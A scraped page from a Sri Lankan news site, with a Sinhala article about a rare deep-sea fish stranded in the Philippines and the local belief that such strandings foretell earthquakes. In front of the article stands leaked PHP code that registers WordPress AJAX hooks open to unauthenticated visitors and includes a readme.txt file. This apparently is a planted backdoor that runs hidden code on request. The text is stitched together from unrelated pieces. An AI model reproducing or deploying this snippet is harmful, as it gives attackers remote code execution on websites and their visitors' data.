if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ගොඩබිමට ආ දුර්ලභ මත්ස්‍යයා භූමිකම්පාවක පෙර නිමිත්තක් (VIDEO) - mediahumanrights.lk
mediahumanrights.lk
International News News

ගොඩබිමට ආ දුර්ලභ මත්ස්‍යයා භූමිකම්පාවක පෙර නිමිත්තක් (VIDEO)

මීටර් 200 ත් 1000 ත් අතර වූ ගැඹුරු මුහුදේ ජීවත්වන දුර්ලභ මත්ස්‍යයකු පසුගියදා පිලිපීන වෙරළට ගොඩ ගසා තිබෙනවා. මෙම මත්ස්‍යයා අඩි 17ක් දක්වා වර්ධනය වන බවද දැක්වෙනවා.
පසුගියදා පිලිපීනයේ Cagayan de Oro නගරයේ වෙරළ තීරයට ගොඩ ගසා සිටි මෙම මත්ස්‍යයා අඩි 15 ක් පමණ දිගකින් යුක්ත වන බවයි විදෙස් මාධ්‍ය වාර්තා දක්වන්නේ.
මින් පෙර අවස්ථාවකදීද මේ වර්ගයේ මත්ස්‍යයන් වෙරළට ගොඩගසා ඇති අතර පසුව එම ප්‍රදේශය ආශ්‍රිතව භූමිකම්පාවක් ඇති වී තිබෙනවා.
පිලිපීන වැසියන් විශ්වාසය පළ කරන්නේ මෙම මත්ස්‍යයන් මෙලෙස ගොඩගැසීම භූමිකම්පාවක පෙර නිමිත්තක් බවයි.
 

Related posts

ඉතා තද ප්‍රහාරාත්මක සුළං ඇති වීමේ තත්ත්වයක් ගැන අනතුරු අඟවයි

Shiran Viraj

කෝටිපති ව්‍යාපාරිකයා තරුණියන් අඹුකමට අරන් දරුවෝ හදලා ඊළඟට කරන දේ හෙළිවෙයි

Shiran Viraj

හාල් කිලෝවක් රු 10 කින් බහී

Shiran Viraj